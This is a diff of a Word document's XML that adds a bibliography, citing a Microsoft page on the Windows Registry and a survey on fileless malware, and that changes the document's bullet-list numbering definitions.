+                  <w:kern w:val="0"/>
+                  <w14:ligatures w14:val="none"/>
+                </w:rPr>
+              </w:pPr>
+              <w:r>
+                <w:fldChar w:fldCharType="begin"/>
+              </w:r>
+              <w:r>
+                <w:instrText>BIBLIOGRAPHY</w:instrText>
+              </w:r>
+              <w:r>
+                <w:fldChar w:fldCharType="separate"/>
+              </w:r>
+              <w:r>
+                <w:rPr>
+                  <w:noProof/>
+                </w:rPr>
+                <w:t xml:space="preserve">Microsoft. (2025, Gennaio 15). </w:t>
+              </w:r>
+              <w:r>
+                <w:rPr>
+                  <w:i/>
+                  <w:iCs/>
+                  <w:noProof/>
+                </w:rPr>
+                <w:t>Informazioni sul Registro di sistema di Windows per gli utenti esperti</w:t>
+              </w:r>
+              <w:r>
+                <w:rPr>
+                  <w:noProof/>
+                </w:rPr>
+                <w:t>. Tratto da Microsoft Learn: https://learn.microsoft.com/it-it/troubleshoot/windows-server/performance/windows-registry-advanced-users</w:t>
+              </w:r>
+            </w:p>
+            <w:p>
+              <w:pPr>
+                <w:pStyle w:val="Bibliografia"/>
+                <w:ind w:left="720" w:hanging="720"/>
+                <w:rPr>
+                  <w:noProof/>
+                  <w:lang w:val="en-US"/>
+                </w:rPr>
+              </w:pPr>
+              <w:r>
+                <w:rPr>
+                  <w:noProof/>
+                  <w:lang w:val="en-US"/>
+                </w:rPr>
+                <w:t xml:space="preserve">Springer Nature. (2020). An emerging threat Fileless malware: a survey and research challenges. </w:t>
+              </w:r>
+              <w:r>
+                <w:rPr>
+                  <w:i/>
+                  <w:iCs/>
+                  <w:noProof/>
+                  <w:lang w:val="en-US"/>
+                </w:rPr>
+                <w:t>Springer Nature Link</w:t>
+              </w:r>
+              <w:r>
+                <w:rPr>
+                  <w:noProof/>
+                  <w:lang w:val="en-US"/>
+                </w:rPr>
+                <w:t>. Retrieved from https://link.springer.com/article/10.1186/s42400-019-0043-x</w:t>
+              </w:r>
+            </w:p>
+            <w:p>
+              <w:r>
+                <w:rPr>
+                  <w:b/>
+                  <w:bCs/>
+                </w:rPr>
+                <w:fldChar w:fldCharType="end"/>
+              </w:r>
+            </w:p>
+          </w:sdtContent>
+        </w:sdt>
+      </w:sdtContent>
+    </w:sdt>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1417" w:right="1134" w:bottom="1134" w:left="1134" w:header="708" w:footer="708" w:gutter="0"/>
@@ -314,6 +2389,453 @@
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
 <w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="01F67106"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="820CA0D8"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="02F1080C"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="BC8A8500"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="1F72111C"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="0044A1C0"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="24796B7F"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="0C2A0FA8"/>
@@ -323,7 +2845,7 @@
       <w:lvlText w:val=""/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="1068" w:hanging="360"/>
+        <w:ind w:left="360" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
         <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
@@ -335,7 +2857,7 @@
       <w:lvlText w:val="%2."/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="1788" w:hanging="360"/>
+        <w:ind w:left="1080" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
     <w:lvl w:ilvl="2" w:tplc="FFFFFFFF" w:tentative="1">
@@ -344,7 +2866,7 @@
       <w:lvlText w:val="%3."/>
       <w:lvlJc w:val="right"/>
       <w:pPr>
-        <w:ind w:left="2508" w:hanging="180"/>
+        <w:ind w:left="1800" w:hanging="180"/>
       </w:pPr>
     </w:lvl>
     <w:lvl w:ilvl="3" w:tplc="FFFFFFFF" w:tentative="1">
@@ -353,7 +2875,7 @@
       <w:lvlText w:val="%4."/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="3228" w:hanging="360"/>
+        <w:ind w:left="2520" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
     <w:lvl w:ilvl="4" w:tplc="FFFFFFFF" w:tentative="1">
@@ -362,7 +2884,7 @@
       <w:lvlText w:val="%5."/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="3948" w:hanging="360"/>
+        <w:ind w:left="3240" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
     <w:lvl w:ilvl="5" w:tplc="FFFFFFFF" w:tentative="1">
@@ -371,7 +2893,7 @@
       <w:lvlText w:val="%6."/>
       <w:lvlJc w:val="right"/>
       <w:pPr>
-        <w:ind w:left="4668" w:hanging="180"/>
+        <w:ind w:left="3960" w:hanging="180"/>
       </w:pPr>
     </w:lvl>
     <w:lvl w:ilvl="6" w:tplc="FFFFFFFF" w:tentative="1">
@@ -380,7 +2902,7 @@
       <w:lvlText w:val="%7."/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="5388" w:hanging="360"/>
+        <w:ind w:left="4680" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
     <w:lvl w:ilvl="7" w:tplc="FFFFFFFF" w:tentative="1">
@@ -389,7 +2911,7 @@
       <w:lvlText w:val="%8."/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="6108" w:hanging="360"/>
+        <w:ind w:left="5400" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
     <w:lvl w:ilvl="8" w:tplc="FFFFFFFF" w:tentative="1">
@@ -398,11 +2920,160 @@
       <w:lvlText w:val="%9."/>
       <w:lvlJc w:val="right"/>
       <w:pPr>
-        <w:ind w:left="6828" w:hanging="180"/>
+        <w:ind w:left="6120" w:hanging="180"/>
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="3762685E"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="5456D60E"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3E2C586D"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="445E341A"/>
@@ -519,7 +3190,692 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="41495812"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="F1F24FBE"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
